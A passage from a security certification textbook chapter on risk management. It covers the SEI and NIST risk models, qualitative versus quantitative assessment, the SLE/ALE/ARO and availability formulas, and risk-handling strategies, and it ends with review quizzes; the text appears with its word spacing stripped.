SoftwareEngineeringInstituteModelInanapproachtailoredformanagingriskinsoftwareprojects,SEIusesthefollowingparadigm(SEI,ContinuousRiskManagementGuidebook[Pittsburgh,PA:CarnegieMellonUniversity,1996],23).Althoughtheterminologyvariesslightlyfromthepreviousmodel,therelationshipsareapparent,andeithermodelcanbeappliedwhereverriskmanagementisused.
TechTip
CanAllRisksBeIdentified?Itisimportanttonotethatnotallrisksneedtobemitigatedorcontrolled;however,asmanyrisksaspossibleshouldbeidentifiedandreviewed.Thosedeemedtohavepotentialimpactshouldbemitigatedbycountermeasures.
1.Identify—Lookforrisksbeforetheybecomeproblems.2.Analyze—Convertthedatagatheredintoinformationthatcanbeusedtomakedecisions.Evaluatetheimpact,probability,andtimeframeoftherisks.Classifyandprioritizeeachoftherisks.
3.Plan—Reviewandevaluatetherisksanddecidewhatactionstotaketomitigatethem.Implementthosemitigatingactions.
4.Track—Monitortherisksandthemitigationplans.Trendsmayprovideinformationtoactivateplansandcontingencies.Reviewperiodicallytomeasureprogressandidentifynewrisks.
5.Control—Makecorrectionsfordeviationsfromtheriskmitigationplans.Correctproductsandprocessesasrequired.Changesinbusinessproceduresmayrequireadjustmentsinplansoractions,asdofaultyplansandrisksthatbecomeproblems.
NISTRiskModelsNISThasseveralinformativeriskmodelsthatcanbeappliedtoanenterprise.NISThaspublishedseveralSpecialPublications(SPs)associatedwithriskmanagement.SP800-39,ManagingInformationSecurityRisk:Organization,Mission,andInformationSystemView,presentsseveralkeyinsights:
Establisharelationshipbetweenaggregatedriskfrominformationsystemsandmission/businesssuccess
Encourageseniorleaderstorecognizetheimportanceofmanaginginformationsecurityriskwithintheorganization
Helpthosewithsystem-levelsecurityresponsibilitiesunderstandhowsystem-levelissuesaffecttheorganization/missionasawhole
SP800-39doesthisthroughtheuseofamodel,illustratedinFigure20.2.Thismodelhastwodistinctlevelsofanalysis,whichworktogetherasoneindescribingriskmanagementactions.
•Figure20.2NISTriskmanagementprocessappliedacrossthetiers
Thefirstlevelofanalysisisrepresentedbyfourelements:Frame,Assess,Respond,andMonitor.Thesecondlevelisrelatedtothetiersrepresentedinthehierarchicaltriangles:Organization,Mission/Business
Processes,andInformationSystems.TheFrameelementrepresentstheorganization’sriskframingthat
establishesthecontextandprovidesacommonperspectiveonhowtheorganizationmanagesrisk.Riskframingiscentraltothemodel,asillustratedbythearrowstotheotherelements.Itsprincipaloutputisariskmanagementstrategythataddresseshowtheorganizationassessesrisk,respondstorisk,andmonitorsrisk.Thethreetiersrepresentthedifferentdistinctlayersinanorganizationthatareassociatedwithrisk.Tier1,representingtheexecutivefunction,iswheretheriskframingoccurs.AtTier2,themissionandbusinessprocesslayer,theriskmanagementfunctionsofassess,respond,andmonitoroccur.Tier3istheinformationsystemlayerwhereactivitiesofriskmanagementaremanifestedinthesystemsoftheorganization.
ModelApplicationThethreemodelexamplesdefinestepsthatcanbeusedinanygeneralorsoftwareriskmanagementprocess.Theseriskmanagementprinciplescanbeappliedtoanyproject,program,orbusinessactivity,nomatterhowsimpleorcomplex.Figure20.3showshowriskmanagementcanbeappliedacrossthecontinuumandthatthecomplexityofriskmanagementgenerallyincreaseswiththesizeoftheproject,program,orbusinesstobemanaged.
•Figure20.3Riskcomplexityversusprojectsize
QualitativelyAssessingRiskQualitativeriskanalysisallowsexpertjudgmentandexperiencetoassumeaprominentrole.Toassessriskqualitatively,youcomparetheimpactofthethreatwiththeprobabilityofoccurrenceandassignanimpactlevelandprobabilityleveltotherisk.Forexample,ifathreathasahighimpactandahighprobabilityofoccurring,theriskexposureishighandprobablyrequiressomeactiontoreducethisthreat(palegreenboxinFigure20.4).Conversely,iftheimpactislowwithalowprobability,theriskexposureislowandnoactionmayberequiredtoreducethelikelihoodoftheoccurrenceorimpactofthisthreat(whiteboxinFigure20.4).Figure20.4showsanexampleofabinaryassessment,whereonlytwooutcomesarepossibleeachforimpactandprobability.Eitheritwillhaveanimpactoritwillnot(oritwillhavealoworhighimpact),anditwilloccuroritwon’t(oritwillhaveahighprobabilityofoccurringoralowprobabilityofoccurring).
•Figure20.4Binaryassessment
Inreality,afewthreatscanusuallybeidentifiedaspresentinghigh-riskexposureandafewthreatspresentlow-riskexposure.Thethreatsthatfallsomewherebetween(paleblueboxesinFigure20.4)willhavetobeevaluatedbyjudgmentandmanagementexperience.Iftheanalysisismorecomplex,requiringthreelevelsofanalysis,such
aslow-medium-highorgreen-yellow-redninecombinationsarepossible,asshowninFigure20.5.Again,thepalegreenboxesprobablyrequireaction,thewhiteboxesmayormaynotrequireaction,andthepaleblueboxesrequirejudgment.(Notethatforbrevity,inFigure20.5thefirsttermineachboxreferstothemagnitudeoftheimpact,andthesecondtermreferstotheprobabilityofthethreatoccurring.)
•Figure20.5Threelevelsofanalysis
Otherlevelsofcomplexityarepossible.Withfivelevelsofanalysis,25valuesofriskexposurearepossible.Inthiscase,thepossiblevaluesofimpactandprobabilitycouldtakeonthevaluesverylow,low,medium,high,orveryhigh.Also,notethatthematrixdoesnothavetobe
symmetrical.Forexample,iftheprobabilityisassessedwiththreevalues(low,medium,high)andtheimpacthasfivevalues(verylow,low,medium,high,veryhigh),theanalysiswouldbeasshowninFigure20.6.(Again,notethatthefirsttermineachboxreferstotheimpact,andthesecondtermineachboxreferstotheprobabilityofoccurrence.)
•Figure20.6A3-by-5levelanalysis
Sofar,theexampleshavefocusedonassessinglikelihoodversusimpact.Qualitativeriskassessmentcanbeadaptedtoavarietyofattributesandsituationsincombinationwitheachother.Forexample,Figure20.7showsthecomparisonofsomespecificrisksthathavebeenidentifiedduringasecurityassessment.Theassessmentidentifiedtheriskareaslistedinthefirstcolumn(weakintranetsecurity,highnumberofmodems,Internetattackvulnerabilities,andweakincidentdetectionandresponsemechanism).Theassessmentalsoidentifiedvariouspotentialimpacts,listedacrossthetop(businessimpact,probabilityofattack,costtofix,anddifficultytofix).Eachoftheimpactshasbeenassessedaslow,medium,orhigh—depictedusinggreen,yellow,andred,respectively.Eachoftheriskareashasbeenassessedwithrespecttoeachofthepotentialimpacts,andanoverallriskassessmenthasbeendeterminedinthelastcolumn.
•Figure20.7Exampleofacombinationassessment
QuantitativelyAssessingRiskWhereasqualitativeriskassessmentreliesonjudgmentandexperience,quantitativeriskassessmentapplieshistoricalinformationandtrendstoattempttopredictfutureperformance.Thistypeofriskassessmentis
highlydependentonhistoricaldata,andgatheringsuchdatacanbedifficult.Quantitativeriskassessmentcanalsorelyheavilyonmodelsthatprovidedecision-makinginformationintheformofquantitativemetrics,whichattempttomeasurerisklevelsacrossacommonscale.Itisimportanttounderstandthatkeyassumptionsunderlieanymodel,
anddifferentmodelswillproducedifferentresultsevenwhengiventhesameinputdata.Althoughsignificantresearchanddevelopmenthavebeeninvestedinimprovingandrefiningthevariousriskanalysismodels,expertjudgmentandexperiencemuststillbeconsideredanessentialpartofanyriskassessmentprocess.Modelscanneverreplacejudgmentandexperience,buttheycansignificantlyenhancethedecision-makingprocess.
AddingObjectivitytoaQualitativeAssessmentItispossibletomoveaqualitativeassessmenttowardbeingmorequantitative.MakingaqualitativeassessmentmoreobjectivecanbeassimpleasassigningnumericvaluestooneofthetablesshowninFigures20.4through20.7.Forexample,theimpactslistedinFigure20.7canbeprioritizedfromhighesttolowestandthenweighted,asshowninTable20.2,withbusinessimpactweightedthemostanddifficultytofixweightedleast.
Table20.2 AddingWeightsandDefinitionstothePotentialImpacts
Next,valuescanbeassignedtoreflecthoweachriskwasassessed.Figure20.7canthusbemademoreobjectivebyassigningavaluetoeachcolorthatrepresentsanassessment.Forexample,aredassessmentindicatesmanycritical,unresolvedissues,andthiswillbegivenanassessmentvalueof3.Greenmeansfewissuesareunresolved,soitisgivenavalueof1.Table20.3showsvaluesthatcanbeassignedforanassessmentusingred,yellow,andgreen.
Table20.3 AddingValuestoAssessments
Thelaststepistocalculateanoverallriskvalueforeachriskarea(eachrowinFigure20.7)bymultiplyingtheweightsdepictedinTable20.2
timestheassessedvaluesfromTable20.3andsummingtheproducts:
Risk=W1*V1+W2*V2+…W4*V4Theriskcalculationandfinalriskvalueforeachriskarealistedin
Figure20.7havebeenincorporatedintoFigure20.8.Theassessedareascanthenbeorderedfromhighesttolowestbasedonthecalculatedriskvaluetoaidmanagementinfocusingontheriskareaswiththegreatestpotentialimpact.
•Figure20.8Finalquantitativeassessmentofthefindings
RiskCalculationMorecomplexmodelspermitavarietyofanalysesbasedonstatisticalandmathematicalmodels.Acommonmethodisthecalculationoftheannualizedlossexpectancy(ALE).CalculatingtheALEcreatesamonetaryvalueoftheimpact.Thiscalculationbeginsbycalculatingasinglelossexpectancy(SLE).
SLEThesinglelossexpectancyiscalculatedusingthefollowingformula:
SLE=assetvalue(AV)×exposurefactor(EF)Exposurefactorisameasureofthemagnitudeoflossofanasset.Forexample,tocalculatetheexposurefactor,assumetheassetvalueof
asmallofficebuildinganditscontentsis$2million.Alsoassumethatthisbuildinghousesthecallcenterforabusiness,andthecompletelossofthecenterwouldtakeawayabouthalfofthecapabilityofthecompany.Therefore,theexposurefactoris50percent.TheSLEis
$2million×0.5=$1million
ALETheALEisthencalculatedsimplybymultiplyingtheSLEbythelikelihoodornumberoftimestheeventisexpectedtooccurinayear,whichiscalledtheannualizedrateofoccurrence(ARO):
ALE=SLE×ARO
AROTheannualizedrateofoccurrence(ARO)isarepresentationofthefrequencyoftheevent,measuredinastandardyear.Iftheeventisexpectedtooccuroncein20years,thentheAROis1/20.TypicallytheAROisdefinedbyhistoricaldata,eitherfromacompany’sown
experienceorfromindustrysurveys.Continuingourexample,assumethatafireatthisbusiness’slocationisexpectedtooccuraboutoncein20years.Giventhisinformation,theALEis
TryThis!CalculateSLE,ARO,andALEAcompanyownsfivewarehousesthroughouttheUnitedStates,eachofwhichisvaluedat$1millionandcontributesequallytothecompany’scapacity.TrycalculatingtheSLE,ARO,andALEforitswarehouselocatedintheMountainWest,wheretheprobabilityofanearthquakeisonceevery500years.Solution:SLE=$1million×1.0;ARO=1/500;ALE=$1million/500,or$2000.
$1million×1/20=$50,000
TheALEdeterminesathresholdforevaluatingthecost/benefitratioofagivencountermeasure.Therefore,acountermeasuretoprotectthisbusinessadequatelyshouldcostnomorethanthecalculatedALEof$50,000peryear.Theexamplesinthischapterhavebeensimplistic,buttheydemonstrate
theconceptsofbothqualitativeandquantitativeriskanalysis.Morecomplexalgorithmsandsoftwarepackagesareavailableforaccomplishingriskanalyses,buttheseexamplessufficeforthepurposesofthistext.
ExamTip:ItisalwaysadvisabletomemorizethesefundamentalequationsforcertificationssuchasCompTIASecurity+:SLE=AV×EFALE=SLE×ARO
ImpactTheimpactofaneventisameasureoftheactuallosswhenathreatexploitsavulnerability.FederalInformationProcessingStandards(FIPS)
199definesthreelevelsofimpactusingthetermshigh,moderate,andlow.Theimpactneedstobedefinedintermsofthecontextofeachorganization,aswhatishighforsomefirmsmaybelowformuchlargerfirms.Thecommonmethodistodefinetheimpactlevelsintermsofimportantbusinesscriteria.Impactscanbeintermsofcost(dollars),performance(servicelevelagreement[SLA]orotherrequirements),schedule(deliverables),oranyotherimportantitem.Impactcanalsobecategorizedintermsoftheinformationsecurityattributethatisrelevanttotheproblem:confidentiality,integrity,oravailability.
MTTRMeantimetorepair(MTTR)isacommonmeasureofhowlongittakestorepairagivenfailure.Thisistheaveragetime,andmayormaynotincludethetimeneededtoobtainparts.
MTBFMeantimebetweenfailures(MTBF)isacommonmeasureofreliabilityofasystemandisanexpressionoftheaveragetimebetweensystemfailures.Thetimebetweenfailuresismeasuredfromthetimeasystemreturnstoserviceuntilthenextfailure.TheMTBFisanarithmeticmeanofasetofsystemfailures:
MTBF=σ(startofdowntime–startofuptime)/numberoffailures
MTTFMeantimetofailure(MTTF)isavariationofMTBF,onethatiscommonlyusedinsteadofMTBFwhenthesystemisreplacedinlieuofbeingrepaired.Otherthanthesemanticdifference,thecalculationsarethesame,andthemeaningisessentiallythesame.
MeasurementofAvailabilityAvailabilityisameasureoftheamountoftimeasystemperformsitsintendedfunction.Reliabilityisameasureofthefrequencyofsystemfailures.Availabilityisrelatedto,but
differentthan,reliabilityandistypicallyexpressedasapercentageoftimethesystemisinitsoperationalstate.Tocalculateavailability,boththeMTTFandtheMTTRareneeded:
Availability=MTTF/(MTTF+MTTR)
AssumingasystemhasanMTTFof6monthsandtherepairtakes30minutes,theavailabilitywouldbe
Availability=6months/(6months+30minutes)=99.9884%
Qualitativevs.QuantitativeRiskAssessmentItisrecognizedthroughoutindustrythatitisimpossibletoconductriskmanagementthatispurelyquantitative.Usuallyriskmanagementincludesbothqualitativeandquantitativeelements,requiringbothanalysisandjudgmentorexperience.Incontrasttoquantitativeassessment,itispossibletoaccomplishpurelyqualitativeriskmanagement.Itiseasytoseethatitisimpossibletodefineandquantitativelymeasureallfactorsthatexistinagivenriskassessment.Itisalsoeasytoseethatariskassessmentthatmeasuresnofactorsquantitativelybutmeasuresthemallqualitativelyispossible.Thedecisionofwhethertousequalitativeversusquantitativerisk
managementdependsonthecriticalityoftheproject,theresourcesavailable,andthemanagementstyle.Thedecisionwillbeinfluencedbythedegreetowhichthefundamentalriskmanagementmetrics,suchasassetvalue,exposurefactor,andthreatfrequency,canbequantitativelydefined.
TechTip
AcceptingRiskInadditiontomitigatingriskortransferringrisk,amanager,knowingthepotentialcostofagivenriskanditsassociatedprobability,mayacceptresponsibilityfortheriskifitdoeshappen.Forexample,amanagermaychoosetoallowaprogrammertomake“emergency”changestoaproductionsystem(inviolationofgoodsegregationofduties)becausethesystemcannotgodownduringagivenperiodoftime.Themanageracceptstheriskthatthe
programmercouldpossiblymakeunauthorizedchangesbecauseofthehighavailabilityrequirementofthatsystem.However,thereshouldalwaysbesomeadditionalcontrolssuchasamanagementrevieworastandardizedapprovalprocesstoensuretheassumedriskisadequatelymanaged.
ToolsManytoolscanbeusedtoenhancetheriskmanagementprocess.Thefollowingtoolscanbeusedduringthevariousphasesofriskassessmenttoaddobjectivityandstructuretotheprocess.UnderstandingthedetailsofeachofthesetoolsisnotnecessaryfortheCompTIASecurity+exam,butunderstandingwhattheycanbeusedforisimportant.Moreinformationonthesetoolscanbefoundinanygoodproject-managementtext.
AffinitygroupingAmethodofidentifyingitemsthatarerelatedandthenidentifyingtheprinciplethattiesthemtogether.
BaselineidentificationandanalysisTheprocessofestablishingabaselinesetofrisks.Itproducesa“snapshot”ofalltheidentifiedrisksatagivenpointintime.
CauseandeffectanalysisIdentifyingrelationshipsbetweenariskandthefactorsthatcancauseit.ThisisusuallyaccomplishedusingfishbonediagramsdevelopedbyDr.KaoruIshikawa,formerprofessorofengineeringattheScienceUniversityofTokyo.
Cost/benefitanalysisAstraightforwardmethodforcomparingcostestimateswiththebenefitsofamitigationstrategy.
GanttchartsAmanagementtoolfordiagrammingschedules,events,andactivityduration.
InterrelationshipdigraphsAmethodforidentifyingcause-and-effectrelationshipsbyclearlydefiningtheproblemtobesolved,identifyingthekeyelementsoftheproblem,andthendescribingtherelationshipsbetweeneachofthekeyelements.
ParetochartsAhistogramthatranksthecategoriesinachartfrom
mostfrequenttoleastfrequent,thusfacilitatingriskprioritization.PERT(programevaluationandreviewtechnique)chartsAdiagramdepictinginterdependenciesbetweenprojectactivities,showingthesequenceanddurationofeachactivity.Whencomplete,thechartshowsthetimenecessarytocompletetheprojectandtheactivitiesthatdeterminethattime(thecriticalpath).
RiskmanagementplanAcomprehensiveplandocumentinghowriskswillbemanagedonagivenproject.Itcontainsprocesses,activities,milestones,organizations,responsibilities,anddetailsofeachmajorriskmanagementactivityandhowitistobeaccomplished.Itisanintegralpartoftheprojectmanagementplan.
Cost-EffectivenessModelingCost-effectivenessmodelingassumesyouareincurringacostandfocusesonthequestionofwhatthevalueofthatcostis.Thisisarationalmeansofeconomicanalysisusedtodeterminetheutilityofaspecificstrategy.Itisanearlyforegoneconclusionyouwillbespendingresourcesonsecurity;thisjustreframesthequestiontooneofutilityandoutcomefromtheactivity.
TechTip
RisksReallyDon’tChange,butTheyCanBeMitigatedOnefinalthoughttokeepinmindisthattheriskitselfdoesn’treallychange,nomatterwhatactionsaretakentomitigatethatrisk.Ahighriskwillalwaysbeahighrisk.However,actionscanbetakentoreducethelikelihoodoftherisk,andtheimpactofthatriskifitoccurs.
Arelatedterm,totalcostofownership(TCO),isthesetofallcosts,everythingfromcapitalcoststooperationalandexception-handlingcosts,thatisassociatedwithatechnology.Therearealotofargumentsoverhow
tocalculateTCO,typicallytofavoronesolutionoveranother,butthatisnotimportantinthisinstance.Itisimportanttonotethedifferencesbetweennormaloperationalcostsandexceptionhandling.Exceptionhandlingisalwaysmoreexpensive.Theobjectiveinriskmanagementistohaveasetofoverlapping
controlssuchthattheTCOisminimized.Thismeansthatthesolutionhasameasuredeffectivenessacrosstheriskspectrumandthatexceptionsareminimalized.Thisiswherethecomplianceversussecuritydebatebecomesinteresting.Weestablishcompliancerulesforavarietyofreasons,butonceestablished,theirfutureeffectivenessdependsupontheassumptionthatthesameriskenvironmentexistsaswhentheywerecreated.Shouldtherisk,thevalue,ortheimpactchangeovertime,thecosteffectivenessofthecompliance-directedcontrolcanshift,frequentlyinanegativefashion.
RiskManagementBestPracticesBestpracticesarethebestdefensesthatanorganizationcanemployinanyactivity.Onemannerofexaminingbestpracticesistoensurethatthebusinesshasthesetofbestpracticestocoveritsoperationalresponsibilities.Atadeeperlevel,thedetailsofthesepracticesneedtothemselvesbebestpracticesifoneistogetthebestlevelofprotection.Ataminimum,riskmitigationbestpracticesincludebusinesscontinuity,highavailability,faulttolerance,anddisasterrecoveryconcepts.Noneoftheseoperateinisolation.Infact,theyareallinterconnected,
sharingelementsastheyallworktogethertoachieveacommonpurpose:thesecurityofthedataintheenterprise,whichismeasuredintermsofriskexposure.Keyelementsofbestpracticesincludeunderstandingofvulnerabilities,understandingthethreatvectorsandlikelihoodsofoccurrence,andtheuseofmitigationtechniquestoreduceresidualrisktomanageablelevels.
SystemVulnerabilitiesVulnerabilitiesarecharacteristicsofanassetthatcanbeexploitedbyathreattocauseharm.Allsystemshavebugsorerrors.Notallerrorsorbugsarevulnerabilities.Foranerrororbugtobeclassifiedasavulnerability,itmustbeexploitable,meaninganattackermustbeabletousethebugtocauseadesiredresult.Therearethreeelementsneededforavulnerabilitytooccur:
Thesystemmusthaveaflaw.
Theflawmustbeaccessiblebyanattacker.
Theattackermustpossesstheabilitytoexploittheflaw.
Vulnerabilitiescanexistinmanylevelsandfrommanycauses.Fromdesignerrors,codingerrors,orunintended(anduntested)combinationsincomplexsystems,therearenumerousformsofvulnerabilities.Vulnerabilitiescanexistinsoftware,hardware,andprocedures.Whetherintheunderlyingsystem,inasecuritycontroldesignedtoprotectthesystem,orintheproceduresemployedintheoperationaluseofthesystem,theresultisthesame:avulnerabilityrepresentsanexploitableweaknessthatincreasesthelevelofriskassociatedwiththesystem.
ExamTip:Vulnerabilitiescanbefixed,removed,andmitigated.Theyarepartofanysystemandrepresentweaknessesthatmaybeexploited.
ThreatVectorsAthreatisanycircumstanceoreventwiththepotentialtocauseharmtoanasset.Forexample,amalicioushackermightchoosetohackyoursystembyusingreadilyavailablehackingtools.Threatscanbeclassifiedingroups,withthetermthreatvectordescribingtheelementsofthese
groups.Athreatvectoristhepathortoolusedbyanattackertoattackatarget.Thereareawiderangeofthreatvectorsthatasecurityprofessionalneedstounderstand:
TheWeb(fakesites,sessionhijacking,malware,wateringholeattacks)
Wirelessunsecuredhotspots
Mobiledevices(iOS/Android)
USB(removable)media
E-mail(links,attachments,malware)
Socialengineering(deceptions,hoaxes,scams,andfraud)
Thislistingismerelyasampleofthreatvectors.Fromadefensivepointofview,itisimportantnottobecomefixatedonspecificthreats,butrathertopayattentiontothethreatvectors.Ifauservisitsawebsitethathasmaliciouscode,thenthenatureofthecode,althoughimportantfromatechnicalviewinonerespect,isnottheprimaryconcern.Theprimaryissueisthemalicioussite,asthisisthethreatvector.
Probability/ThreatLikelihoodTheprobabilityorlikelihoodofaneventisameasureofhowoftenitisexpectedtooccur.Fromaqualitativeassessmentusingtermssuchasfrequent,occasionally,andrare,tothequantitativemeasureARO,thepurposeistoallowscalingbasedonfrequencyofanevent.Determiningthespecificprobabilitiesofsecurityeventswithanyaccuracyisanearlyimpossiblefeat.Whatisimportantintheuseofprobabilitiesandlikelihoodsistherelationshipithaswithrespecttodeterminingrelativerisk.Justasaninsurancecompanycannottellyouwhenyouwillhaveanaccident,noonecanpredictwhenasecurityeventwilloccur.Whatcanbedeterminedisthatoversomecourseoftime—say,thenextyear—a
significantnumberofuserswillclickmaliciouslinksine-mails.Thethreatlikelihoodofdifferenttypesofattackswillchangeovertime.Yearsago,webdefacementswerealltherage.Today,spearphishingismoreprevalent.
Theuseofinsurance-typeactuarialmodelsforriskdeterminationisusefulwhenrisksareindependent,suchasinautoaccidents.Butcontrolsneedtobeaddedwhenafactorbecomeslessindependent,suchasabaddriver.Incybersecurity,onceanattackissuccessful,itisrepeatedlyemployedagainstavictim,breakinganyformofindependenceandmakingtheprobability=1.Thislessensthetrueusefulnessoftheinsurance-typeactuarialmodelsincybersecuritypractice.
Whenexaminingrisk,theprobabilityorthreatlikelihoodplaysasignificantroleinthedeterminationofriskandmitigationoptions.Inmanycases,thelikelihoodistreatedascertain,andforrepeatattacks,thismaybeappropriate,butitcertainlyisnotuniversallytrue.
Risk-Avoidance,Transference,Acceptance,Mitigation,DeterrenceRisksareabsolutes—theycannotberemovedoreliminated.Actionscanbetakentochangetheeffectsthatariskposestoasystem,buttheriskitselfdoesn’treallychange,nomatterwhatactionsaretakentomitigatethatrisk.Ahighriskwillalwaysbeahighrisk.However,actionscanbetakentoreducetheimpactofthatriskifitoccurs.Alimitednumberofstrategiescanbeusedtomanagerisk.Theriskcanbeavoided,transferred,mitigated,oraccepted.Avoidingtheriskcanbeaccomplishedinmanyways.Althoughthreats
cannotberemovedfromtheenvironment,one’sexposurecanbealtered.Notdeployingamodulethatincreasesriskisonemannerofriskavoidance.Anotherpossibleactiontomanageriskistotransferthatrisk.A
commonmethodoftransferringriskistopurchaseinsurance.Insuranceallowsrisktobetransferredtoathirdpartythatmanagesspecifictypesofriskformultipleparties,thusreducingtheindividualcost.Anothercommonexampleofrisktransferistheprotectionagainstfraudthatconsumershaveontheircreditcards.Theriskistransferredtoanotherparty,sopeoplecanusethecardinconfidence.Riskcanalsobemitigatedthroughtheapplicationofcontrolsthat
reducetheimpactofanattack.Controlscanalertoperatorssothatthelevelofexposureisreducedthroughprocessintervention.Whenanactionoccursthatisoutsidetheacceptedriskprofile,asecondsetofrulescanbeapplied,suchascallingthecustomerforverificationbeforecommittingatransaction.Controlssuchasthesecanacttoreducetheriskassociatedwithpotentialhigh-riskoperations.Acceptingriskisalwaysanoption;infact,ifrisksarenotaddressed,
thenthisactionoccursasadefault.Understandthatriskcannotbecompletelyeliminated.Ariskthatremainsafterimplementingcontrolsistermedaresidualrisk.Inthisstep,youfurtherevaluateresidualriskstoidentifywhereadditionalcontrolsarerequiredtoreduceriskevenmore.Thisleadsustotheearlierstatement,inthechapterintroduction,thattheriskmanagementprocessisiterative.
RisksAssociatedwithCloudComputingandVirtualizationWhenexaminingacomplexsystemsuchasacloudorvirtualcomputingenvironmentfromariskperspective,severalbasicconsiderationsalwaysneedtobeobserved.First,thefactthatasystemiseitherinthecloudorvirtualizeddoesnotchangehowriskworks.Riskiseverywhere,andchangingasystemtoanewenvironmentdoesnotchangethefactthattherearerisks.Second,complexitycanincreaseriskexposure.Therearespecificrisksassociatedwithbothvirtualizationandcloud
environments.Havingdataandcomputingoccurinenvironmentsthatarenotunderthedirectcontrolofthedataowneraddsbothalayerof
complexityandadegreeofrisk.Thepotentialforissueswithconfidentiality,integrity,andavailabilityincreaseswiththelossofdirectcontrolovertheenvironment.Thevirtualizationandcloudlayersalsopresentnewavenuesofattackintoasystem.Securityisaparticularchallengewhendataandcomputationare
handledbyaremoteparty,asincloudcomputing.Thespecificchallengeishowtoallowdataoutsideyourenterpriseandyetremainincontrolovertheuseofthedata.Thecommonanswerisencryption.Throughtheproperuseofencryptionofdatabeforeitleavestheenterprise,externalstoragecanstillbeperformedsecurelybyproperlyemployingcryptographicelements.Thesecurityrequirementsassociatedwithconfidentiality,integrity,andavailabilityremaintheresponsibilityofthedataowner,andmeasuresmustbetakentoensurethattheserequirementsaremet,regardlessofthelocationorusageassociatedwiththedata.Anotherlevelofprotectionsisthroughtheuseofservicelevelagreements(SLAs)withthecloudvendor,althoughthesefrequentlycannotoffermuchremedyintheeventofdataloss.
Chapter20Review
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingaboutriskmanagement.
Useriskmanagementtoolsandprinciplestomanageriskeffectively
Riskmanagementisakeymanagementprocessthatmustbeusedateverylevel,whethermanagingaproject,aprogram,oranenterprise.
Riskmanagementisalsoastrategictooltomoreeffectivelymanageincreasinglysophisticated,diverse,andgeographicallyexpansive
businessopportunities.Commonbusinessrisksincludefraudandmanagementoftreasury,revenue,contracts,environment,regulatoryissues,businesscontinuity,andtechnology.
Technologyrisksincludesecurityandprivacy,informationtechnologyoperations,businesssystemscontrolandeffectiveness,informationsystemstesting,andmanagementofbusinesscontinuity,reliabilityandperformance,informationtechnologyassets,projectrisk,andchange.
Exploreriskmitigationstrategies
Manybusinessprocessescanbeusedtomitigatespecificformsofrisk.Thesetoolsincludechangeandincidentmanagement,userrightsandpermissionreviews,routinesystemaudits,andtheuseoftechnologicalcontrolstopreventoralertondataloss.
Describeriskmodels
Ageneralmodelformanagingriskincludesassetidentification,threatassessment,impactdeterminationandquantification,controldesignandevaluation,andresidualriskmanagement.
TheSEImodelformanagingriskincludesthesesteps:identify,analyze,plan,track,andcontrol.
Explainthedifferencesbetweenqualitativeandquantitativeriskassessment
Bothqualitativeandquantitativeriskassessmentapproachesmustbeusedtomanageriskeffectively,andanumberofapproacheswerepresentedinthischapter.
Qualitativeriskassessmentreliesonexpertjudgmentandexperiencebycomparingtheimpactofathreatwiththeprobabilityofitoccurring.
Qualitativeriskassessmentcanbeasimplebinaryassessmentweighing
highorlowimpactagainsthighorlowprobability.Additionallevelscanbeusedtoincreasethecomprehensivenessoftheanalysis.Thewell-knownred-yellow-greenstoplightmechanismisqualitativeinnatureandiseasilyunderstood.
Quantitativeriskassessmentapplieshistoricalinformationandtrendstoassessrisk.Modelsareoftenusedtoprovideinformationtodecision-makers.
Acommonquantitativeapproachcalculatestheannualizedlossexpectancyfromthesinglelossexpectancyandtheannualizedrateofoccurrence(ALE=SLE×ARO).
Itisimportanttounderstandthatitisimpossibletoconductapurelyquantitativeriskassessment,butitispossibletoconductapurelyqualitativeriskassessment.
Useriskmanagementtools
Numeroustoolscanbeusedtoaddcredibilityandrigortotheriskassessmentprocess.
Riskassessmenttoolshelpidentifyrelationships,causes,andeffects.Theyassistinprioritizingdecisionsandfacilitateeffectivemanagementoftheriskmanagementprocess.
Examineriskmanagementbestpractices
Explorebusinesscontinuityconcepts.
Exploretherelationshipsbetweenvulnerabilities,threatvectors,probabilities,andthreatlikelihoodsastheyapplytoriskmanagement.
Understandthedifferencesbetweenriskavoidance,transference,acceptance,mitigation,anddeterrence.
KeyTerms
annualizedlossexpectancy(ALE)(611)annualizedrateofoccurrence(ARO)(611)asset(610)availability(625)control(610)countermeasure(611)exposurefactor(611)hazard(611)impact(610)intangibleimpact(617)meantimebetweenfailures(MTBF)(624)meantimetofailure(MTTF)(625)meantimetorepair(MTTR)(624)mitigate(611)qualitativeriskassessment(611)quantitativeriskassessment(611)residualrisk(618)risk(610)riskanalysis(610)riskassessment(610)riskmanagement(610)safeguard(610)singlelossexpectancy(SLE)(611)systematicrisk(611)tangibleimpact(617)threat(610)threatactor(610)threatvector(610)unsystematicrisk(611)vulnerability(610)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.Assetvalue×exposurefactor=_______________.2.Acontrolmayalsobecalleda(n)______________ora(n)
_______________.
3.Whenathreatexploitsavulnerability,youexperiencea(n)_______________.
4.Singlelossexpectancy×annualizedrateofoccurrence=_______________.
5.Ifyoureducethelikelihoodofathreatoccurring,you_______________arisk.
6.The_______________measuresthemagnitudeofthelossofanasset.
7.Riskanalysisissynonymouswith____________.8.Anycircumstanceoreventwiththepotentialtocauseharmtoan
assetisa(n)_______________.
9.Acharacteristicofanassetthatcanbeexploitedbyathreattocauseharmisits_______________.
10._______________isacircumstancethatincreasesthelikelihoodorprobableseverityofaloss.
Multiple-ChoiceQuiz1.Whichofthefollowingcorrectlydefinesqualitativerisk
management?
A.Theprocessofobjectivelydeterminingtheimpactofanevent
thataffectsaproject,program,orbusiness
B.Theprocessofsubjectivelydeterminingtheimpactofaneventthataffectsaproject,program,orbusiness
C.Thelossthatresultswhenavulnerabilityisexploitedbyathreat
D.Toreducethelikelihoodofathreatoccurring
2.Whichofthefollowingcorrectlydefinesrisk?A.Theriskstillremainingafteraniterationofriskmanagement
B.Thelossthatresultswhenavulnerabilityisexploitedbyathreat
C.Anycircumstanceoreventwiththepotentialtocauseharmtoanasset
D.Thepossibilityofsufferingharmorloss
3.Singlelossexpectancy(SLE)canbestbedefinedbywhichofthefollowingequations?
A.SLE=annualizedlossexpectancy×annualizedrateofoccurrence
B.SLE=assetvalue×exposurefactor
C.SLE=assetvalue×annualizedrateofoccurrence
D.SLE=annualizedlossexpectancy×exposurefactor
4.Whichofthefollowingcorrectlydefinesannualizedrateofoccurrence?
A.Howmuchaneventisexpectedtocostperyear
B.Ameasureofthemagnitudeoflossofanasset
C.Onanannualizedbasis,thefrequencywithwhichaneventis
expectedtooccur
D.Theresourcesorinformationanorganizationneedstoconductitsbusiness
